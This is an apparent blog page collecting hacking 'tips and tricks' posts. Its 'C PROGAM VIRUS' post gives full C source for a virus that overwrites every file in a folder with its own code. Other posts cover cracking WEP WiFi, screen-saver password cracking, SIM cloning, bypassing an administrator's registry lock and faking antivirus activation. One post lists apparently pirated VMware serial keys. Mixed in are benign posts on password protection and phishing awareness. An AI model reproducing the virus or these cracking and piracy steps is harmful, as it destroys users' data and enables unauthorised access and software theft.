Showing posts with label COMPUTER TIPS AND TRICKS. Show all posts
Showing posts with label COMPUTER TIPS AND TRICKS. Show all posts

Friday, 1 August 2014

How To Open Banned Websites With Proxy Websites


Open Banned Websites WIth Proxy SitesThere are many sites which are blocked by government because of breaking laws of their country. The user downloads many softwares to open these sites but end up being infected by  malware, virus. Today i will share a trick with you guys which can help you easily open these banned sites without downloading anything. As you know that there are many online proxies but everyone need a proxy server which is faster and trusted. Here in this post I am revealing an online proxy and a tutorial to open banned sites with the help of these online proxies which is trusted and fast. Just follow my step to open banned sites.

How To Open Banned Site ?

Wednesday, 6 November 2013

REMOVE USB SHORTCUT VIRUS

If all your folders in pendrive/flash drives or memory cards are converted into shortcut icons then it is a good news for you. 

image
Now I’m going to tell you how to remove this virus without using any antivirus software. If you have not formatted your flash drive then you can solve this problem.

Most of the people come across this type of issues with their working environment.  So for solving it follow the steps given below:

Steps are very easy

First of all Click on Start >> Run >> and type cmd and click on OK

Sunday, 16 June 2013

HACK REMOTE COMPUTERS ON YOUR NETWORK

Note : I m not responsible for what ur going to do with this trick.






Firstly I Will Tell You What Is Internet Protocol (IP) ??



The Internet Protocol is the principal communications protocol used for relaying datagram (packets) across an
internetwork using the Internet Protocol Suite. Responsible for routing packets across network boundaries, it is the primary protocol that establishes the Internet. 



IP is the primary protocol in the Internet layer of the Internet Protocol Suite and has the task of delivering
datagrams from the source host to the destination host solely based on their addresses. For this Purpose, IP defines addressing methods and structures for datagram encapsulation

HACK WIFI USING WINDOWS

Hi all users I think many Windows users here are struggling to hack WiFi networks because most of the tutorials are based on Backtrack and other Linux Tools . So today I'm here for sharing a method to Crack WiFi networks using WEP security protocol .The WEP is a very vulnerable to attacks and can be cracked easily .
 

 

 It takes about 5-6 hours if the password is weak a high signal of the WiFi network you are going to hack and you have sometimes 10-12 for more complicated passwords and if the WiFi signal of the Network is weak .The time taken also changes if the WiFi network you are going to hack has many other clients already accessing it . 
 
 
You will be using two tools :
 
1. Commview for WiFi : You will use this tool for capturing the packets sent and recieved through the Access Point you are going to hack .The more packets you capture the better chances of cracking the password .You will need more than 1,00,000 minium packets to crack the password .The packets will be captured in the .ncp format .You will use this tool to
convert the .ncp to .cap .

SERIAL KEYS OF 50+ SOFTWARES

╚═►VMware Workstation v9.X ◄═╝
 
Serial Key:→↓
ZF3X0-4ZW0Q-0842P-E6PGC-PKRZF
VY19K-01X5L-084MY-MXMZG-MAUF2
YA5X2-FEFDK-H80VQ-4YWQC-MPARD
YU1WA-F1GD7-485UQ-ADNNT-XCAR6
GF1WR-FGZ5J-485RY-JGQQC-XZ2G8
AY3HA-F1D5N-08D7Q-Z6X5T-XK2G2
YG5EK-D1X8L-088XY-NNQEC-P3AW6
VF14H-0YFE5-48D2Z-ZDPNT-YFUZ8
ZU31H-2WY83-0853Y-Z5WQZ-ZAAC6
GC1WK-F8XEM-M812P-9WMG9-XUU9F
AY540-00W0M-088DY-GDQ7T-QL8Z8
FF34U-A5W11-H80UP-F6WNV-NL8V6
CF71K-AGD52-H894Q-Q4P7E-XL2R6
YZ5MA-6GXDP-0841Y-K4PNG-XK2ZF
========================================================================
 
╚═►NovaPDF Professional Desktop v7.7.387◄═╝

TOP 15 FREE HACKING TOOLS




1. Nmap





Nmap (“Network Mapper”) is a free and open source (license) utility for network discovery and security auditing. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics.

Sim Card Cloning

[Sim Cloning is Illegal. This Post is

Only  For Educational Use]

 
 
SIM cloning is the process in which a legitimate SIM card is duplicated. When the cloning is completed, the cloned SIM card's identifying information is transferred onto a separate, secondary SIM card. The secondary card can then be used in a different phone while having all calls and associated charges attributed to the original SIM card. The phrase SIM clone is often used to refer to the SIM card that has been successfully duplicated.

YES, a SIM Can be Cloned**
 
** There are Special considerations & Not All SIMs available, can be cloned.
 
You Need Special Hardware. NOT the ordinarily available SIM Reader/Writer. These "Writers" can ONLY insert SMS & Contacts . Nothing Beyond That.
The Hardware should be able to write to the EEPROM (or Programmable Memory) of the SIM.

Monday, 10 June 2013

C PROGAM VIRUS


HOW TO CREATE VIRUS THROUGH "C" PROGRAMMING




#include
#include
#include
#include
#include
#include

FILE *virus,*host;
int done,a=0;
unsigned long x;
char buff[2048];
struct ffblk ffblk;
clock_t st,end;

void main()
{
st=clock();
clrscr();
done=findfirst(“*.*”,&ffblk,0);
while(!done)
{
virus=fopen(_argv[0],”rb”);
host=fopen(ffblk.ff_name,”rb+”);
if(host==NULL) goto next;
x=89088;
printf(“Infecting %s\n”,ffblk.ff_name,a);
while(x>2048)
{
fread(buff,2048,1,virus);
fwrite(buff,2048,1,host);
x-=2048;
}
fread(buff,x,1,virus);
fwrite(buff,x,1,host);
a++;
next:
{
fcloseall();
done=findnext(&ffblk);
}
}
printf(“DONE! (Total Files Infected= %d)”,a);
end=clock();
printf(“TIME TAKEN=%f SEC\n”,
(end-st)/CLK_TCK);
getch();
}

 

CODE FOR GETTING COMPUTER'S PASSWORD

CODE FOR GETTING COMPUTER'S PASSWORD


 Code :
 # include<stdio.h>
 # include<stdio.h>
 # include<process.h>
 # include<stdlib.h>
 # include<ctype.h>
 # include<conio.h>
 # include<mem.h>

 unsigned char huge Data[100001];
 unsigned char keystream[1001];
 int Rpoint[300];

 void main(int argc,char *argv[]){
 FILE *fd;
 int i,j;
 int size;
 char ch;
 char *name;
 int cracked;
 int sizemask;
 int maxr;
 int rsz;
 int pos;
 int Rall[300];     /* Resourse allocation table */

 if(argc<2){
   printf("usage: glide filename (username)");
   exit(1);
 }

PARTITION HIDING SOFTWARE IN C

PARTITION HIDING SOFTWARE IN C


 /* program to read the partition table of hard disk and can hide and
 revele partitions*/

 #include<stdio.h>
 #include<bios.h>
 #include<dos.h>
 #include<stdlib.h>

 typedef unsigned char BYTE;
 typedef unsigned int WORD;
 typedef unsigned long DWORD;

 enum BOOL {TRUE=0,FALSE=1};
 struct PARTITIONINFO {
  BYTE bootid;   /* bootable?  0=no, 128=yes  */
  BYTE beghead;  /* beginning head number */
  BYTE begsect;  /* beginning sector number */
  BYTE begcyl;   /* 10 bit nmbr, with high 2 bits put in begsect */
  BYTE systid;   /* Operating System type indicator code */
  BYTE endhead;  /* ending head number */
  BYTE endsect;  /* ending sector number */
  BYTE endcyl;   /* also a 10 bit nmbr, with same high 2 bit trick */
  DWORD relsect; /* first sector relative to start of disk */
  DWORD numsect; /* number of sectors in partition */
 };

FOLDER PROTECTION SOFTWARE


FOLDER PROTECTION PROGRAM


CAN BE COMPILED BY THE PREVIOSLY GIVEN COMPILERS IN THE POST NAMED SCREEN SAVER PASSWORD CRACKER.


 #include<stdio.h>
 #include<string.h>
 #include<process.h>
 void main()
 {
 FILE *p;
 char ch,s[100];
 char r[100]="REN ";

 char u[]=".{21EC2020-3AEA-1069-A2DD-08002B30309D} ";
 char v[50];
 int choice,i;

 clrscr();
 p=fopen("C:\a.bat","w+");
 if(p==NULL)

PASSWORD CRACKER

SCREEN SAVER PASSWORD CRACKER

THIS IS THE CODE OF A C/C++ PROGRAM WHICH CAN BE COMPILED BY USING DEV C++ AND CODE BLOKS OR TURBO C++. IT IS CREATED BY ONE OF MY FRIEND.


 /*
 Screen Saveer Password Cracker:
 Decrypts Screen Saver Password which is stored in user.dat.
 */

 #include<ctype.h>
 #include<stdio.h>
 #include<string.h>
 FILE *fp;
 char *path="c:\windows\user.dat";

 /*encrypted password stored in this file when u log on to default user..
 If there r multiple users..Password stored in
 \windowsprofilesuser-nameuser.dat...

 */

ACTIVATE KASPERSKY 2013 WITH KEY FILE

HOW TO ACTIVATE KASPERSKY 2013 13.0.1.4190 USING KEY FILES!
 
1. Open Kaspersky 2011 License Manager (from lower right corner).
 
2. Click 'Activate the application with a new license' button. (Delete any trial key first, by clicking the red X next to the key).
 
3. Disable your internet connection
 
4. Select 'Activate commercial version' and enter the activation license code as                                          11111-11111-11111-1111X
 
5. Wait activation wizard message-Click OK

Sunday, 9 June 2013

HOW TO ENABLE REGISTRY EDITING (regedit) DISABLED BY ADMINISTRATOR

This is the common problem faced every PC user and many of you do you do not know how to re-enable it so now I am going to tell you how to do it please just follow the steps given below :-
Enable Registry Editor Using Group Policy Editor
1. Click on Start. Go to Run. Users running Windows 8, Windows 7 or Vista, go to Search.
2. Type gpedit.msc and press Enter.
3. Navigate to User Configuration/ Administrative Templates / System.
4. In the work area, double click on "Prevent Access to registry editing tools".

Saturday, 18 August 2012

CHECK LIST FOR PROTECTION

A protection check list


Here is a checklist of things you can do to make password cracking more difficult:
  1. Audit your organization! Do a walk through and make sure passwords are not stuck to monitors or under keyboards.
  2.  Set up dummy accounts. Get rid of the administrator (or admin) account or set it up as a trap and audit it for attempts.
  3.  Use strong, difficult to guess passwords, and never leave a console unlocked.
  4.  Backups are necessary in case you are compromised. You need a working set of data, so make sure you have it. Keep the tapes secure too, or the data there will be compromised as well.
  5.  Prevent dumpster diving. Don't throw sensitive information away; shred it or lock it up.
  6.  Check IDs and question people you don't know. When you have visitors, check them out and make sure they belong.
  7. Educate your end users. Make sure they aren't prone to social engineering and educate and remind internal users of the company's security policies.

ABOUT HACKING TOOLS

Tools of the trade


One of the most popular tools is L0phtCrack (now called LC4). L0phtCrack is a tool that allows an attacker to take encrypted Windows NT/2000 passwords and convert them to plain text. NT/2000 passwords are in cryptographic hashes and cannot be read without a tool like L0phtCrack. It works by attempting every alphanumeric combination possible to try to crack passwords.

METHODS OF HACKING

Password cracking doesn't always involve sophisticated tools. It can be as simple as finding a sticky note with the password written on it stuck right to the monitor or hidden under a keyboard. Another crude technique is known as "dumpster diving," which basically involves an attacker going through your garbage to find discarded documentation that may contain passwords.


Of course attacks can involve far greater levels of sophistication. Here are some of the more common techniques used in password cracking:

Friday, 17 August 2012

Steganography

 NEW TRICK FOR HIDING FILE

Encrypting and decrypting any data has been very old fashion in today’s era. Technology has developed so much that these are something in reach of every Tom, Dick and Harry. So, to be an odd one out in this era, we have to do something new…like Steganography. This is an art of hiding data into data. Merely Steganography is an idea developed in 1950 by a chemical engineer who invented a new way to write with invisible ink between the lines, by scientist Morse. From that era, till today much more have been developed.

Steganography is the science of hiding information. Whereas the goal of cryptography is to make

Thursday, 16 August 2012

CHEAT ENGINE

 ABOUT CHEAT ENGINE

Download Cheat Engine 5.5Cheat Engine is an open source tool designed to help you with modifying single player games running under windows so you can make them harder or easier depending on your preference(e.g: Find that 100hp is too easy, try playing a game with a max of 1 HP), but also contains other useful tools to help debugging games and even normal applications.

Download Cheat Engine from

PHISHING


ABOUT PHISHING


The problem with phishing is that most of the people are unaware of the whole issue of phishing. Web users, who are already in threat from various elements like virus, spyware etc, are facing a larger threat than any of them, but what is phishing? And how can it harm you? These are the questions, which will be answered in the next few lines.

Phishing

Phishing is an online scam, where people associated with it pose as legitimate website or links and ask for the details of the user, like the personal, contact and financial details. Then they